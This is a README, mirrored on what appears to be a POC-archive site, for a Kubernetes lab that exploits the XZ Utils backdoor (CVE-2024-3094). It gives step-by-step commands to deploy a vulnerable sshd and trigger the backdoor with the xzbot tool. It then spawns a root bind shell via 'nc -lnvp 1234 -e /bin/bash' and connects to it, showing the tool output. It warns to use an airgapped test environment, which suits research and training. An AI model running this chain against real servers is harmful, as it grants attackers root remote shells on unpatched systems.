关联漏洞
描述
XZ Utils CVE-2024-3094 POC for Kubernetes
介绍
# xzwhy
```
_ _ ____ _ _
( \/ )(_ )( \/ )
) ( / /_ \ /
(_/\_)(____) (__)
```
This project is a Kubernetes-friendly Proof of Concept (POC) for [CVE-2024-3094](https://nvd.nist.gov/vuln/detail/CVE-2024-3094) affecting XZ Utils. See [this article](https://pentest-tools.com/blog/xz-utils-backdoor-cve-2024-3094) for an excellent walkthrough of the exploit's provenance and mechanics.
# WARNING
⚠⚠⚠
Running any of the commands below may result in the deployment of a vulnerable application that is highly susceptible to attack. If you choose to follow these steps, it is recommended that you do so in an airgapped test environment.
⚠⚠⚠
## Instructions
### 1: Roll out the vulnerable application
```
kubectl create -f xzwhy.yml
```
This will deploy a vulnerable SSH endpoint whose entrypoint is ```/bin/bash -c "env -i LANG=en_US.UTF-8 && unset TERM && unset LD_DEBUG && LD_LIBRARY_PATH=/CVE-2024-3094/ /usr/sbin/sshd -p 2222 -D"```
### 2: Obtain the vulnerable endpoint's URL
The vulnerable SSH endpoint exposes two ports via a load balancer: 2222 is listening for SSH connections and 1234 is a convenience to allow ingress on a bind shell port that we will use during the exploit
```
type: LoadBalancer
ports:
- name: ssh
protocol: TCP
port: 2222
targetPort: 2222
- name: exploitshellingress
protocol: TCP
port: 1234
targetPort: 1234
```
We can extract the deployed loadbalancer's URL using kubectl:
```
xzwhy_endpoint=`kubectl get services -o jsonpath='{.items[0].status.loadBalancer.ingress[0].hostname}' --namespace=xzwhy-ns --field-selector metadata.name=xzwhy-loadbalancer` && echo $xzwhy_endpoint
```
### 3: Initiate the attack by making a malicious SSH connection
Now we connect to the vulnerable server using the [teamnautilus/xzbot](https://hub.docker.com/r/teamnautilus/xzbot) utility:
```
docker run -it --rm golang:latest /bin/bash -c "mkdir -p /xzbot && pushd /xzbot/ && git clone https://github.com/amlweems/xzbot.git && ls -laF && pushd ./xzbot/ && go build -o /xzbot/tmp/; popd && /xzbot/tmp/xzbot -h && /xzbot/tmp/xzbot -addr $xzwhy_endpoint:2222 -cmd 'nc -lnvp 1234 -e /bin/bash'"
```
This will cause the vulnerable SSH server to execute a bind shell via ```nc -lnvp 1234 -e /bin/bash``` on our behalf. After running this command you should see something similar to:
```
Cloning into 'xzbot'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 30 (delta 14), reused 25 (delta 10), pack-reused 0
Receiving objects: 100% (30/30), 422.65 KiB | 8.99 MiB/s, done.
Resolving deltas: 100% (14/14), done.
total 12
drwxr-xr-x 3 root root 4096 Apr 17 22:37 ./
drwxr-xr-x 1 root root 4096 Apr 17 22:37 ../
drwxr-xr-x 4 root root 4096 Apr 17 22:37 xzbot/
/xzbot/xzbot /xzbot /go
go: downloading github.com/cloudflare/circl v1.3.7
go: downloading golang.org/x/crypto v0.21.0
go: downloading golang.org/x/sys v0.18.0
/xzbot /go
Usage of /xzbot/tmp/xzbot:
-addr string
ssh server address (default "127.0.0.1:2222")
-cmd string
command to run via system() (default "id > /tmp/.xz")
-seed string
ed448 seed, must match xz backdoor key (default "0")
00000000 00 00 00 1c 73 73 68 2d 72 73 61 2d 63 65 72 74 |....ssh-rsa-cert|
00000010 2d 76 30 31 40 6f 70 65 6e 73 73 68 2e 63 6f 6d |-v01@openssh.com|
00000020 00 00 00 00 00 00 00 03 01 00 01 00 00 01 01 01 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000130 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 |................|
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000160 00 00 01 14 00 00 00 07 73 73 68 2d 72 73 61 00 |........ssh-rsa.|
00000170 00 00 01 01 00 00 01 00 34 12 00 00 78 56 00 00 |........4...xV..|
00000180 a2 ff d9 f9 ff ff ff ff a1 36 c4 cc b3 b2 4d b3 |.........6....M.|
00000190 99 11 52 a7 2c 38 d2 29 f9 5d 1a 06 63 36 1e 48 |..R.,8.).]..c6.H|
000001a0 9c 95 4e f1 77 41 07 92 1c a4 9f b0 b4 dc 93 c2 |..N.wA..........|
000001b0 66 03 3d fa 5c 8b 49 41 86 26 42 88 2b 9d 5b 4c |f.=.\.IA.&B.+.[L|
000001c0 b8 a4 5e 9d 62 c3 51 0a be ca 5d 8a 47 45 3a 1e |..^.b.Q...].GE:.|
000001d0 99 1f c1 0e 97 b7 58 ec 51 45 5b 24 3f b4 69 6a |......X.QE[$?.ij|
000001e0 68 45 7c 3b 3a d9 d7 0a ad 09 04 d8 a1 b9 81 22 |hE|;:.........."|
000001f0 58 69 eb 07 ad 91 53 15 b2 1d bf 47 b9 48 a0 4e |Xi....S....G.H.N|
00000200 8b 28 cd 82 4b fd 72 17 12 ce 7f e7 15 3c 9e fa |.(..K.r......<..|
00000210 a7 e1 d6 e4 ec eb 66 34 5a 74 00 00 00 00 00 00 |......f4Zt......|
00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000270 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 07 |................|
00000280 73 73 68 2d 72 73 61 00 00 00 01 00 |ssh-rsa.....|
```
### 4: Profit
Connect to the shell you spawned. Note the use of the xzwhy_endpoint variable:
```
nc $xzwhy_endpoint 1234
```
It isn't immediately obvious, but the command above connects to a bind shell as root. You can test this by running various commands:
```
whoami
root
```
```
hostname -i
10.0.128.62
```
### 5: Cleanup
```
kubectl delete -f xzwhy.yml
```
# Credits
* [teamnautilus](https://hub.docker.com/r/teamnautilus/xzbot) created a [server vulnerable to the exploit](https://hub.docker.com/r/teamnautilus/xzbot)
* [amlweems](https://github.com/amlweems/xzbot.git) published an automated tool for exploiting vulnerable SSH endpoints
* [patorjk](http://patorjk.com/) created an excellent [text-to-ascii art generator](https://patorjk.com/software/taag/#p)
文件快照
[4.0K] /data/pocs/0d1696ba44db2dc9ab0db51b64c6ab755cae7005
├── [ 11K] LICENSE
├── [7.1K] README.md
└── [1.7K] xzwhy.yml
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。